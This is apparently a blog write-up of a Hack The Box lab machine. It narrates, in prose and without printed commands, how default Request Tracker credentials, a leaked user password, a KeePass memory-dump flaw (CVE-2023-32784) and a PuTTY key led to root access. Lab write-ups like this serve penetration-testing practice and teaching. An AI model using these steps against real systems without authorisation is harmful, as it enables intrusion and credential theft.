Enumeration

Nmap

Initial NMAP scan revealed SSH, HTTP ports are open.

00 - nmap

WEB Enumeration

Visiting the HTTP website revealed a domain, so I added it to hosts file.

01 - website

Searching “request tracker default credentials” on the internet revealed a root credential and I logged in to the website.

02 - root password

Exploitation

Inside the website under Admin -> Users -> Select, there was a user other than the root.

03 Admin-Users-Select

Clicking to it, and analyzing it revealed default password for that user.

04 - password

So I simply logged in using SSH.

05 - user

Privilege Escalation

On the user’s home directory, there was a zipped file. Inside of it there was keepass dump and kdbx file.

06 - rt3000

So I transfered those files to my computer using scp and started analyzing it.

CVE-2023-32784

This version of keepass was vulnerable to CVE-2023-32784 which can be explained as “In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump”.

So at first I tried to dump password with this tool but could not dump. Then I used keepass-dump-extractor to extract a wordlist.

07 - create keepass list from dumps

Then using the wordlist I cracked the kdbx file.

08 - cracked

After cracking it I tried to login with keepass2 but it did not work because password had some non-unicode characters. So I used kpcli to login.

09 - kpcli login

Inside the kpcli we can use commands like cd, ls. Some enumeration revealed two ticket files.

I can run show -f to show the record. The first record revealed Putty SSH key inside it.

10 -ticket file

So at first I downloaded putty-tools then run the command puttygen to create a openssh key “id_rsa” from the PuTTy key.

11 - putty to openssh

Then using that key I got the root.

12 - ssh

Pwned

The machine was pwned.

13 - pwned

<
Previous Post
Soccer - Hack The Box
>
Next Post
Sweep - Hack The Box